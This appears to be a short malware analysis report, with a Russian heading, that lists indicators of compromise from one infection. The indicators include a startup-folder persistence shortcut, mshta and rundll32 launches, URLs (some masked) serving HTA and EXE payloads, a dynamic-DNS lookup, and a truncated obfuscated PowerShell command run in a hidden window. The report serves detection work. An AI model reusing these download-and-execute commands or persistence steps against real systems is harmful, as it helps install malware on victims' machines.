Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\svhoster.lnk
- '<SYSTEM32>\mshta.exe' http://bi#.do/fC2he
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL C:\Users\Public\ole
- 'C:\users\public\ole.exe'
- ole.exe
- C:\users\public\ole
- C:\users\public\ole.exe
- http://bi#.do/fC2he
- http://18#.#42.104.197/gkrq/out-pic4.hta
- http://bi#.do/fC2gm
- http://18#.#42.104.197/gkrq/Photo4.jpg
- http://bi#.do/fCZ9Q
- http://18#.#42.104.197/gkrq/eraz.exe
- DNS ASK bi#.do
- DNS ASK wi#####e0901.mywire.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count...' (со скрытым окном)